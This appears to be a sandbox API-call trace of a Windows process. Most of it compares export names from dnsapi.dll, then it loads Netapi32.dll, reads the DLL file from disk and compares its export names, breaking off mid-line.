[0252.745] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="DnsAcquireContextHandle_W") returned 0 [0252.745] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0252.745] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0252.745] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="AddRefQueryBlobEx") returned 1 [0252.745] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="BreakRecordsIntoBlob") returned 1 [0252.745] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="Coalesce_UpdateNetVersion") returned 1 [0252.745] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="CombineRecordsInBlob") returned 1 [0252.745] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="DeRefQueryBlobEx") returned 1 [0252.745] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="DelaySortDAServerlist") returned 1 [0252.745] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="DnsAcquireContextHandle_A") returned 1 [0252.745] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="DnsAcquireContextHandle_W") returned 1 [0252.745] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="DnsAllocateRecord") returned 0 [0252.745] lstrcmpA (lpString1="DnsApiAlloc", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0252.745] lstrcmpA (lpString1="DnsApiAlloc", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0252.745] lstrcmpA (lpString1="DnsApiAlloc", lpString2="AddRefQueryBlobEx") returned 1 [0252.745] lstrcmpA (lpString1="DnsApiAlloc", lpString2="BreakRecordsIntoBlob") returned 1 [0252.745] lstrcmpA (lpString1="DnsApiAlloc", lpString2="Coalesce_UpdateNetVersion") returned 1 [0252.745] lstrcmpA (lpString1="DnsApiAlloc", lpString2="CombineRecordsInBlob") returned 1 [0252.745] lstrcmpA (lpString1="DnsApiAlloc", lpString2="DeRefQueryBlobEx") returned 1 [0252.745] lstrcmpA (lpString1="DnsApiAlloc", lpString2="DelaySortDAServerlist") returned 1 [0252.745] lstrcmpA (lpString1="DnsApiAlloc", lpString2="DnsAcquireContextHandle_A") returned 1 [0252.745] lstrcmpA (lpString1="DnsApiAlloc", lpString2="DnsAcquireContextHandle_W") returned 1 [0252.745] lstrcmpA (lpString1="DnsApiAlloc", lpString2="DnsAllocateRecord") returned 1 [0252.746] lstrcmpA (lpString1="DnsApiAlloc", lpString2="DnsApiAlloc") returned 0 [0252.746] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0252.746] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0252.746] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="AddRefQueryBlobEx") returned 1 [0252.746] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="BreakRecordsIntoBlob") returned 1 [0252.746] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="Coalesce_UpdateNetVersion") returned 1 [0252.746] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="CombineRecordsInBlob") returned 1 [0252.746] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="DeRefQueryBlobEx") returned 1 [0252.746] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="DelaySortDAServerlist") returned 1 [0252.746] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="DnsAcquireContextHandle_A") returned 1 [0252.746] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="DnsAcquireContextHandle_W") returned 1 [0252.746] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="DnsAllocateRecord") returned 1 [0252.746] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="DnsApiAlloc") returned 1 [0252.746] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="DnsApiAllocZero") returned 0 [0252.746] lstrcmpA (lpString1="DnsApiFree", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0252.746] lstrcmpA (lpString1="DnsApiFree", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0252.746] lstrcmpA (lpString1="DnsApiFree", lpString2="AddRefQueryBlobEx") returned 1 [0252.746] lstrcmpA (lpString1="DnsApiFree", lpString2="BreakRecordsIntoBlob") returned 1 [0252.746] lstrcmpA (lpString1="DnsApiFree", lpString2="Coalesce_UpdateNetVersion") returned 1 [0252.746] lstrcmpA (lpString1="DnsApiFree", lpString2="CombineRecordsInBlob") returned 1 [0252.746] lstrcmpA (lpString1="DnsApiFree", lpString2="DeRefQueryBlobEx") returned 1 [0252.746] lstrcmpA (lpString1="DnsApiFree", lpString2="DelaySortDAServerlist") returned 1 [0252.746] lstrcmpA (lpString1="DnsApiFree", lpString2="DnsAcquireContextHandle_A") returned 1 [0252.746] lstrcmpA (lpString1="DnsApiFree", lpString2="DnsAcquireContextHandle_W") returned 1 [0252.747] lstrcmpA (lpString1="DnsApiFree", lpString2="DnsAllocateRecord") returned 1 [0252.747] lstrcmpA (lpString1="DnsApiFree", lpString2="DnsApiAlloc") returned 1 [0252.747] lstrcmpA (lpString1="DnsApiFree", lpString2="DnsApiAllocZero") returned 1 [0252.747] lstrcmpA (lpString1="DnsApiFree", lpString2="DnsApiFree") returned 0 [0252.747] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0252.747] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0252.747] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="AddRefQueryBlobEx") returned 1 [0252.747] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="BreakRecordsIntoBlob") returned 1 [0252.747] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="Coalesce_UpdateNetVersion") returned 1 [0252.747] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="CombineRecordsInBlob") returned 1 [0252.747] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DeRefQueryBlobEx") returned 1 [0252.747] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DelaySortDAServerlist") returned 1 [0252.747] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DnsAcquireContextHandle_A") returned 1 [0252.747] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DnsAcquireContextHandle_W") returned 1 [0252.747] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DnsAllocateRecord") returned 1 [0252.747] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DnsApiAlloc") returned 1 [0252.747] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DnsApiAllocZero") returned 1 [0252.747] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DnsApiFree") returned 1 [0252.747] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DnsApiHeapReset") returned 0 [0252.747] lstrcmpA (lpString1="DnsApiRealloc", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0252.747] lstrcmpA (lpString1="DnsApiRealloc", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0252.747] lstrcmpA (lpString1="DnsApiRealloc", lpString2="AddRefQueryBlobEx") returned 1 [0252.747] lstrcmpA (lpString1="DnsApiRealloc", lpString2="BreakRecordsIntoBlob") returned 1 [0252.747] lstrcmpA (lpString1="DnsApiRealloc", lpString2="Coalesce_UpdateNetVersion") returned 1 [0252.747] lstrcmpA (lpString1="DnsApiRealloc", lpString2="CombineRecordsInBlob") returned 1 [0252.747] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DeRefQueryBlobEx") returned 1 [0252.748] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DelaySortDAServerlist") returned 1 [0252.748] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsAcquireContextHandle_A") returned 1 [0252.748] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsAcquireContextHandle_W") returned 1 [0252.748] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsAllocateRecord") returned 1 [0252.748] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsApiAlloc") returned 1 [0252.748] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsApiAllocZero") returned 1 [0252.748] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsApiFree") returned 1 [0252.748] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsApiHeapReset") returned 1 [0252.748] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsApiRealloc") returned 0 [0252.748] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0252.748] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0252.748] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="AddRefQueryBlobEx") returned 1 [0252.748] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="BreakRecordsIntoBlob") returned 1 [0252.748] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="Coalesce_UpdateNetVersion") returned 1 [0252.783] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="CombineRecordsInBlob") returned 1 [0252.783] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DeRefQueryBlobEx") returned 1 [0252.783] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DelaySortDAServerlist") returned 1 [0252.783] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsAcquireContextHandle_A") returned 1 [0252.783] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsAcquireContextHandle_W") returned 1 [0252.783] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsAllocateRecord") returned 1 [0252.784] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsApiAlloc") returned 1 [0252.784] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsApiAllocZero") returned 1 [0252.784] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsApiFree") returned 1 [0252.784] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsApiHeapReset") returned 1 [0252.784] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsApiRealloc") returned 1 [0252.784] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsApiSetDebugGlobals") returned 0 [0252.784] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0252.784] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0252.784] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="AddRefQueryBlobEx") returned 1 [0252.784] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="BreakRecordsIntoBlob") returned 1 [0252.784] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="Coalesce_UpdateNetVersion") returned 1 [0252.784] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="CombineRecordsInBlob") returned 1 [0252.784] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DeRefQueryBlobEx") returned 1 [0252.784] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DelaySortDAServerlist") returned 1 [0252.784] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsAcquireContextHandle_A") returned 1 [0252.784] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsAcquireContextHandle_W") returned 1 [0252.784] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsAllocateRecord") returned 1 [0252.784] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsApiAlloc") returned 1 [0252.784] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsApiAllocZero") returned 1 [0252.784] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsApiFree") returned 1 [0252.784] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsApiHeapReset") returned 1 [0252.784] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsApiRealloc") returned 1 [0252.784] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsApiSetDebugGlobals") returned 1 [0252.784] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsAsyncRegisterHostAddrs") returned 0 [0252.784] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0252.784] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0252.784] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="AddRefQueryBlobEx") returned 1 [0252.784] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="BreakRecordsIntoBlob") returned 1 [0252.784] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="Coalesce_UpdateNetVersion") returned 1 [0252.784] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="CombineRecordsInBlob") returned 1 [0252.784] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DeRefQueryBlobEx") returned 1 [0252.784] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DelaySortDAServerlist") returned 1 [0252.784] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsAcquireContextHandle_A") returned 1 [0252.784] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsAcquireContextHandle_W") returned 1 [0252.784] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsAllocateRecord") returned 1 [0252.785] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsApiAlloc") returned 1 [0252.785] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsApiAllocZero") returned 1 [0252.785] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsApiFree") returned 1 [0252.785] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsApiHeapReset") returned 1 [0252.785] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsApiRealloc") returned 1 [0252.785] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsApiSetDebugGlobals") returned 1 [0252.785] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsAsyncRegisterHostAddrs") returned 1 [0252.785] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsAsyncRegisterInit") returned 0 [0252.785] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0252.785] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0252.785] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="AddRefQueryBlobEx") returned 1 [0252.785] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="BreakRecordsIntoBlob") returned 1 [0252.785] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="Coalesce_UpdateNetVersion") returned 1 [0252.785] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="CombineRecordsInBlob") returned 1 [0252.785] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DeRefQueryBlobEx") returned 1 [0252.785] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DelaySortDAServerlist") returned 1 [0252.785] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsAcquireContextHandle_A") returned 1 [0252.785] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsAcquireContextHandle_W") returned 1 [0252.785] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsAllocateRecord") returned 1 [0252.785] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsApiAlloc") returned 1 [0252.785] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsApiAllocZero") returned 1 [0252.785] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsApiFree") returned 1 [0252.785] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsApiHeapReset") returned 1 [0252.785] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsApiRealloc") returned 1 [0252.785] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsApiSetDebugGlobals") returned 1 [0252.785] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsAsyncRegisterHostAddrs") returned 1 [0252.785] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsAsyncRegisterInit") returned 1 [0252.785] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsAsyncRegisterTerm") returned 0 [0252.785] lstrcmpA (lpString1="DnsCancelQuery", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0252.785] lstrcmpA (lpString1="DnsCancelQuery", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0252.785] lstrcmpA (lpString1="DnsCancelQuery", lpString2="AddRefQueryBlobEx") returned 1 [0252.785] lstrcmpA (lpString1="DnsCancelQuery", lpString2="BreakRecordsIntoBlob") returned 1 [0252.785] lstrcmpA (lpString1="DnsCancelQuery", lpString2="Coalesce_UpdateNetVersion") returned 1 [0252.785] lstrcmpA (lpString1="DnsCancelQuery", lpString2="CombineRecordsInBlob") returned 1 [0252.786] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DeRefQueryBlobEx") returned 1 [0252.786] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DelaySortDAServerlist") returned 1 [0252.786] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsAcquireContextHandle_A") returned 1 [0252.786] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsAcquireContextHandle_W") returned 1 [0252.786] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsAllocateRecord") returned 1 [0252.786] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsApiAlloc") returned 1 [0252.786] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsApiAllocZero") returned 1 [0252.786] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsApiFree") returned 1 [0252.786] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsApiHeapReset") returned 1 [0252.786] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsApiRealloc") returned 1 [0252.786] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsApiSetDebugGlobals") returned 1 [0252.786] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsAsyncRegisterHostAddrs") returned 1 [0252.786] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsAsyncRegisterInit") returned 1 [0252.786] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsAsyncRegisterTerm") returned 1 [0252.786] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsCancelQuery") returned 0 [0252.786] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0252.786] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0252.786] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="AddRefQueryBlobEx") returned 1 [0252.786] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="BreakRecordsIntoBlob") returned 1 [0252.786] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="Coalesce_UpdateNetVersion") returned 1 [0252.786] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="CombineRecordsInBlob") returned 1 [0252.786] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DeRefQueryBlobEx") returned 1 [0252.786] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DelaySortDAServerlist") returned 1 [0252.786] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsAcquireContextHandle_A") returned 1 [0252.786] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsAcquireContextHandle_W") returned 1 [0252.786] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsAllocateRecord") returned 1 [0252.786] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsApiAlloc") returned 1 [0252.786] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsApiAllocZero") returned 1 [0252.786] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsApiFree") returned 1 [0252.787] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsApiHeapReset") returned 1 [0252.787] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsApiRealloc") returned 1 [0252.787] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsApiSetDebugGlobals") returned 1 [0252.787] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsAsyncRegisterHostAddrs") returned 1 [0252.794] GetProcessHeap () returned 0x430000 [0252.794] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x39cd010 | out: hHeap=0x430000) returned 1 [0252.794] GetProcessHeap () returned 0x430000 [0252.794] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x10) returned 0x4497e0 [0252.795] LoadLibraryA (lpLibFileName="Netapi32.dll") returned 0x7ffc5cb30000 [0252.797] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0252.797] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0252.797] GetModuleFileNameA (in: hModule=0x7ffc5cb30000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\Netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll")) returned 0x20 [0252.798] CreateFileA (lpFileName="C:\\Windows\\system32\\Netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0252.798] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0252.798] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0252.798] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=80640) returned 1 [0252.798] GetProcessHeap () returned 0x430000 [0252.798] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13b00) returned 0x2c95030 [0252.798] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0252.798] ReadFile (in: hFile=0x17c, lpBuffer=0x2c95030, nNumberOfBytesToRead=0x13b00, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x2c95030*, lpNumberOfBytesRead=0x14f5a4*=0x13b00, lpOverlapped=0x0) returned 1 [0252.799] CloseHandle (hObject=0x17c) returned 1 [0252.799] lstrcmpA (lpString1="NetAccessAdd", lpString2="DavAddConnection") returned 1 [0252.799] lstrcmpA (lpString1="NetAccessAdd", lpString2="DavDeleteConnection") returned 1 [0252.799] lstrcmpA (lpString1="NetAccessAdd", lpString2="DavFlushFile") returned 1 [0252.799] lstrcmpA (lpString1="NetAccessAdd", lpString2="DavGetExtendedError") returned 1 [0252.799] lstrcmpA (lpString1="NetAccessAdd", lpString2="DavGetHTTPFromUNCPath") returned 1 [0252.799] lstrcmpA (lpString1="NetAccessAdd", lpString2="DavGetUNCFromHTTPPath") returned 1 [0252.799] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsAddressToSiteNamesA") returned 1 [0252.799] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsAddressToSiteNamesExA") returned 1 [0252.799] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsAddressToSiteNamesExW") returned 1 [0252.799] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsAddressToSiteNamesW") returned 1 [0252.799] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsDeregisterDnsHostRecordsA") returned 1 [0252.799] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsDeregisterDnsHostRecordsW") returned 1 [0252.799] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsEnumerateDomainTrustsA") returned 1 [0252.799] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsEnumerateDomainTrustsW") returned 1 [0252.799] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcCloseW") returned 1 [0252.799] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcNameA") returned 1 [0252.799] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcNameW") returned 1 [0252.799] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcNameWithAccountA") returned 1 [0252.799] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcNameWithAccountW") returned 1 [0252.799] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcNextA") returned 1 [0252.800] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcNextW") returned 1 [0252.800] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcOpenA") returned 1 [0252.800] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcOpenW") returned 1 [0252.800] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcSiteCoverageA") returned 1 [0252.800] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcSiteCoverageW") returned 1 [0252.800] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetForestTrustInformationW") returned 1 [0252.800] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetSiteNameA") returned 1 [0252.800] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetSiteNameW") returned 1 [0252.800] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsMergeForestTrustInformationW") returned 1 [0252.800] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsRoleFreeMemory") returned 1 [0252.800] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsRoleGetPrimaryDomainInformation") returned 1 [0252.800] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsValidateSubnetNameA") returned 1 [0252.800] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsValidateSubnetNameW") returned 1 [0252.800] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserDebugCall") returned 1 [0252.800] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserDebugTrace") returned 1 [0252.800] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserQueryEmulatedDomains") returned 1 [0252.800] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserQueryOtherDomains") returned 1 [0252.800] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserQueryStatistics") returned 1 [0252.800] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserResetNetlogonState") returned 1 [0252.800] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserResetStatistics") returned 1 [0252.800] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserServerEnum") returned 1 [0252.800] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserSetNetlogonState") returned 1 [0252.800] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_DsUpdateReadOnlyServerDnsRecords") returned 1 [0252.800] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetAccountDeltas") returned 1 [0252.800] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetAccountSync") returned 1 [0252.800] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetChainSetClientAttributes") returned 1 [0252.800] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetChainSetClientAttributes2") returned 1 [0252.800] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetDatabaseDeltas") returned 1 [0252.800] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetDatabaseRedo") returned 1 [0252.800] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetDatabaseSync") returned 1 [0252.800] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetDatabaseSync2") returned 1 [0252.801] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetDfsGetVersion") returned 1 [0252.801] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetDfsIsThisADomainName") returned 1 [0252.801] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetGetDCList") returned 1 [0252.801] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetGetForestTrustInformation") returned 1 [0252.801] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonControl") returned 1 [0252.801] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonControl2") returned 1 [0252.801] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonGetDomainInfo") returned 1 [0252.801] 